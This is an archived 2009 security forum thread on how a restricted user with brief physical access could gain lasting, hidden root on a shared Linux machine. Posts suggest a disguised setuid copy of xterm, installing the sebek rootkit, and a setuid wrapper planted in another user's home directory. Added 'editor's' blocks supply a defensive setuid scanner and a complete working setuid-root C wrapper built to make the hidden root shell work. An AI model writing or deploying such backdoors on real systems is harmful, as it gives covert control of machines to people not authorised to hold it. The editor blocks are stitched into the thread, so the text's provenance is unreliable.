Remote Exploit Forums > Specialist Topics > Pentesting (specific topics related to legal penetration testing)

Thread: If you had physical access to a Linux machine

#1  10-29-2009, 02:47 AM
Virchanza, Senior Member (Join Date: Sep 2008; Location: I am not living; Posts: 728)

Let's say you have "restricted user" access to a Linux computer, the kind of user account that can't use "sudo".

If you had physical access to this machine for 10 minutes, what would you tweak in it so that from that point on you can always do whatever you want with it, without the knowledge of anyone else who uses the computer?

I was thinking I'd boot up a live CD or live USB of Linux. Then I'd navigate to "/usr/bin" on the hard disk and make a copy of the file "xterm", maybe name it something obscure like "params" so nobody would look at it twice. Then I'd set the SUID bit on this "params" file.

From that point on, I'd be able to boot up the PC as a "restricted user" and then just run "params" whenever I want a root terminal. And once I have a root terminal, I can do whatever I want.

Any other ideas?
__________________
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

#2  10-29-2009, 02:54 AM
Gitsnik, Senior Member (Join Date: Jun 2009; Location: The Crystal Wind; Posts: 494)

Boot it up (from live CD, mount -o rw /dev/blah), install sebek, reboot it. Instant rootkit, forensically capable, and it doesn't get caught by my nightly search-for-setuid.
__________________
Never underestimate the power of human stupidity - it is like a force of nature, capable of destroying even the most well laid plans.

#3  10-29-2009, 06:54 AM
Virchanza

Hey, could you post the command you use to check your entire hard disk for programs that have the SUID bit set? I've been meaning to do this myself.

#4  10-29-2009, 07:46 AM
Gitsnik

Quote (Virchanza): Hey, could you post the command you use to check your entire hard disk for programs that have the SUID bit set? I've been meaning to do this myself.

Sure can:

Code:
    find / -perm -4000 -print | mail gitsnik

Run it as a cron job - I leave it up to you to figure out for GID.

Programs like rkhunter search this up, as does the FreeBSD security program each morning. I actually use a lot of badly hacked perl and a secured database on another server to do my checks (I'm a little paranoid on my internal LAN :P) because, of course, some programs are meant to be set uid.
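Added example (editor's code, not from Gitsnik's post): a small C equivalent of the find job above that walks a tree with nftw(), reports setuid and setgid regular files in one pass (covering the GID case left as an exercise), and prints owner, mode and size so the listing can be saved as a baseline and diffed by the nightly cron job instead of mailed whole. The fixture directory it builds under /tmp is constructed for demonstration only; FTW_PHYS and FTW_MOUNT (no symlink following, one filesystem per run) are my assumptions about what such an audit should cover.

```c
#define _XOPEN_SOURCE 700
#include <ftw.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* nftw() callbacks take no user pointer, so the current scan's state is global. */
static FILE *g_out;
static int g_found;

static int on_entry(const char *path, const struct stat *sb, int typeflag, struct FTW *ftw)
{
    (void)ftw;
    if (typeflag != FTW_F)                 /* regular files only; with FTW_PHYS a symlink is FTW_SL */
        return 0;
    if (!(sb->st_mode & (S_ISUID | S_ISGID)))
        return 0;
    g_found++;
    if (g_out)
        fprintf(g_out, "%c%c %04o %5u %5u %10lld %s\n",
                (sb->st_mode & S_ISUID) ? 'u' : '-',
                (sb->st_mode & S_ISGID) ? 'g' : '-',
                (unsigned)(sb->st_mode & 07777),
                (unsigned)sb->st_uid, (unsigned)sb->st_gid,
                (long long)sb->st_size, path);
    return 0;                              /* 0 = keep walking */
}

/* Walk `root` without following symlinks or crossing mount points and print
 * one line per set-id regular file to `out` (NULL = count only).
 * Returns the number found, or -1 if the walk itself failed. */
int scan_setid(const char *root, FILE *out)
{
    g_out = out;
    g_found = 0;
    if (nftw(root, on_entry, 32, FTW_PHYS | FTW_MOUNT) < 0)
        return -1;
    return g_found;
}

/* Constructed test fixture, not a real system: a temp tree holding a setuid
 * file at the top, a setuid file one level down, and a plain file. */
static char g_fixture[64];
const char *make_fixture(void)
{
    snprintf(g_fixture, sizeof g_fixture, "/tmp/setid-scan-XXXXXX");
    if (!mkdtemp(g_fixture)) return NULL;
    char p[128];
    const char *names[] = { "params", "sub/deeper", "plain" };
    mode_t modes[]      = { 04755, 04755, 0755 };
    snprintf(p, sizeof p, "%s/sub", g_fixture);
    if (mkdir(p, 0755) < 0) return NULL;
    for (int i = 0; i < 3; i++) {
        snprintf(p, sizeof p, "%s/%s", g_fixture, names[i]);
        int fd = open(p, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0 || close(fd) < 0 || chmod(p, modes[i]) < 0) return NULL;
    }
    return g_fixture;
}

int main(int argc, char **argv)
{
    const char *root = argc > 1 ? argv[1] : make_fixture();
    if (!root) { perror("fixture"); return 1; }
    printf("ug mode   uid   gid       size path\n");
    int n = scan_setid(root, stdout);
    if (n < 0) { perror("nftw"); return 1; }
    printf("%d set-id file(s) under %s\n", n, root);
    return 0;
}
```

Run it with a path (`./setidscan /usr/bin`) or with no argument to scan the fixture. Keeping yesterday's listing and diffing today's against it catches both a new set-id file such as the "params" copy from post #1 and an existing binary whose size or owner changed, which is what the stat columns are for; because FTW_MOUNT stops at mount points, run it once per filesystem rather than once on / so it never descends into /proc.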

#5  10-29-2009, 07:10 PM
Virchanza

I copied my "xterm" file and named it "params".

If I do the following:

Code:
    ls -l /usr/bin/params

Then the output I get is:

Code:
    -rwsr-xr-x 1 root root 332628 Oct 29 17:26 /usr/bin/params

However, when I actually run this program as a normal user, the XTerm program doesn't give me a root shell, it simply gives me a normal shell as a normal user. Why so?!

I've compared the permissions of this file with "sudo", and here's the permissions for "sudo":

Code:
    -rwsr-xr-x 1 root root 115136 Feb 17  2009 /usr/bin/sudo

You'll notice that both files have exactly the same permissions, yet "sudo" obviously always runs as root.

Any idea what I'm doing wrong?

#6  10-29-2009, 11:32 PM
Gitsnik

Quote (Virchanza): Any idea what I'm doing wrong?

Try the same with copies of /bin/sh and /bin/csh. One should get you root, the other should not.

The reason varies, but it usually comes down to a getuid() variant which gets your actual username, rather than just your effective one. Check your C reference for the exact call (or man getuid). The idea is to get around the setuid bit and run as the normal user (programs like /bin/bash don't get used in most shellcode for this reason).

If, however, you wrote a quick wrapper program in C and kept it in your home directory (or, to annoy them, someone else's):
Code:
    mkdir -p /home/enemy/.Remote/

you could have your own shell ready and waiting. This is still subject to the likelihood of detecting a setuid program with that find command.

Look at any ol' shellcode basics tutorial for a simple C program that executes /bin/sh, then modify that to do what you want (make it run /bin/xterm, for example) - so long as you don't make it setuid(getruid()) and drop the privs (assuming I got the function calls correct), it should let you run xterms as root, or whoever. (Edit: subject to environment variables and such that pertain to X - this doesn't work on my BSD desktop without some setenv() tweaking in the C wrapper.)

Last edited by Gitsnik; 10-29-2009 at 11:36 PM. Reason: Environment Variables Note
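Added example (editor's code, not from Gitsnik's post) of the C wrapper described above, which also explains why the setuid copy of xterm in post #5 gave an unprivileged shell. bash (unless started with -p) and xterm compare the real and effective ids at start-up and fall back to the real ones when they differ; shell_would_drop_privs() mirrors that check, and keep_effective_ids() is the setuid(geteuid()) step the shell would otherwise undo: when the binary is setuid root the effective uid is 0, so the call sets the real and saved uids to 0 as well and the child no longer sees a mismatch. build_env() is the setenv() tweaking from the edit: it hands the caller's DISPLAY and Xauthority cookie to the child so a root xterm can open the user's display instead of looking for /root/.Xauthority. Assumptions of mine: the default target /bin/sh, the PATH value, and the variable names in the environment.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* What bash (without -p) and xterm do on start-up: if real and effective ids
 * differ they assume they are running set-id and drop to the real ones.
 * Returns 1 if that drop would happen for the given ids. */
int shell_would_drop_privs(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* The opposite of what the shell does: make the real ids equal the effective
 * ones. Under a setuid-root binary geteuid() is 0, so setuid(0) sets real,
 * effective and saved uid to 0. Run from an ordinary process it is a no-op
 * that still succeeds. Group first, while we are still privileged. */
int keep_effective_ids(void)
{
    if (setgid(getegid()) < 0) return -1;
    if (setuid(geteuid()) < 0) return -1;
    return 0;
}

/* Minimal environment for the child, NULL-terminated, in static storage.
 * DISPLAY and XAUTHORITY come from the invoking user; if the user has no
 * XAUTHORITY set, the cookie is in $HOME/.Xauthority of that user, not root's. */
static char *g_env[6];
static char g_envbuf[2][256];

char **build_env(const char *display, const char *xauth, const char *caller_home)
{
    size_t n = 0;
    g_env[n++] = "PATH=/usr/sbin:/usr/bin:/sbin:/bin";   /* assumed value */
    g_env[n++] = "TERM=xterm";
    g_env[n++] = "HOME=/root";
    if (display) {
        snprintf(g_envbuf[0], sizeof g_envbuf[0], "DISPLAY=%s", display);
        g_env[n++] = g_envbuf[0];
        if (xauth)
            snprintf(g_envbuf[1], sizeof g_envbuf[1], "XAUTHORITY=%s", xauth);
        else
            snprintf(g_envbuf[1], sizeof g_envbuf[1], "XAUTHORITY=%s/.Xauthority",
                     caller_home ? caller_home : "");
        g_env[n++] = g_envbuf[1];
    }
    g_env[n] = NULL;
    return g_env;
}

size_t env_len(char **env)
{
    size_t n = 0;
    while (env[n]) n++;
    return n;
}

int main(int argc, char **argv)
{
    const char *target = argc > 1 ? argv[1] : "/bin/sh";   /* e.g. /usr/bin/xterm */
    if (keep_effective_ids() < 0) { perror("setuid"); return 1; }
    /* getenv() still sees the invoking user's variables after the id change. */
    char **env = build_env(getenv("DISPLAY"), getenv("XAUTHORITY"), getenv("HOME"));
    char *child_argv[] = { (char *)target, NULL };
    execve(target, child_argv, env);
    perror("execve");
    return 1;
}
```

Compiled, owned by root and given mode 4755 (the permissions shown in post #5), it starts whatever it is given as argv[1] with uid 0; the bare setuid copy of xterm fails only because keep_effective_ids() is missing from it. Two caveats for a tester: the kernel ignores the set-id bits on scripts, so only a compiled binary works, and if the filesystem holding it is mounted nosuid (common for /tmp) the bit is not honoured at all. Either way the "s" in ls -l and Gitsnik's find job still see the file; a kernel-level tool like sebek is what that search does not cover.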